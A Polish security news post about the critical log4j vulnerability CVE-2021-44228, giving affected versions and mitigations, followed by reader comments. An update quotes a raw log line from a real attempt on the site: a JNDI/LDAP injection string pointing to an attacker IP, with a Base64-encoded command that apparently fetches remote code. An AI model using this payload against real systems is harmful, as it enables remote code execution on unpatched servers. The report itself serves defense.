-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

Krytyczna podatność w log4j (CVE-2021-44228) – łatajcie, bo zaczęło się masowe exploitowanie

10 grudnia 2021, 08:19 | W biegu | komentarzy 5
Tagi: , ,
Uwaga – rozbudowany wpis o podatności log4j mamy dostępny tutaj.

Szczegóły podatności dostępne są tutaj, a wg relacji podatne są również (oczywiście) biblioteki czy rozwiązania wykorzystujące Apache log4j (mowa jest m.in. o Steam, iCloud czy serwerach Minecraft). Prawdopodobnie podatne są też rozwiązania wykorzystujące bibliotekę Struts.

Podatne wersje log4j: 2.0 <= Apache log4j <= 2.14.1

Exploit jest bardzo prosty i wymaga aby po stronie serwerowej logowane było coś, co atakujący prześle w dowolny sposób do aplikacji (np. jako wartość dowolnej zmiennej GET czy POST). Wykorzystanie podatności daje możliwość wykonania wrogiego kodu po stronie serwerowej.

Dobra wiadomość: prawdopodobnie nie są podatne systemy używające JDK w wersjach wyższych niż:  6u2117u2018u191,  11.0.1.

Rekomendacje? Wg wstępnych doniesień powinno pomóc:

Start your server with log4j2.formatMsgNoLookups set to true, or update to log4j-2.15.0-rc1 or later.

Podatność została załatana 5 dni temu, trwają aktywne exploitacje.

Aktualizacja 1: dostępna jest już łatka (2.15.0)

Aktualizacja 2. ktoś próbował nawet exploitować sekuraka (nie, nie korzystamy z Javy):

45.155.205.233 - - [10/Dec/2021:13:25:54 +0000] "GET / HTTP/1.1" 200 17191 "http://51.77.40.125:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MS43Ny40MC4xMjU6ODB8fHdnZXQgLXEgLU[...]

~Michał Sajdak

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Batrek

    45.155.205.233 cisnie skanerem – dzis w pracy widzialem ten IP ma mostku technicznym

    Odpowiedz
    • Szymon

      u nas ten sam IP

      Odpowiedz
  2. Pytanie czy i w jaki sposób strona WordPress mogłaby być w ten sposób zaatakowana? Nie znam się, ale gdy napisaliście o metodach GET i POST, zacząłem się zastanawiać :)

    Odpowiedz
  3. Kamil
    Odpowiedz

Odpowiedz na Batrek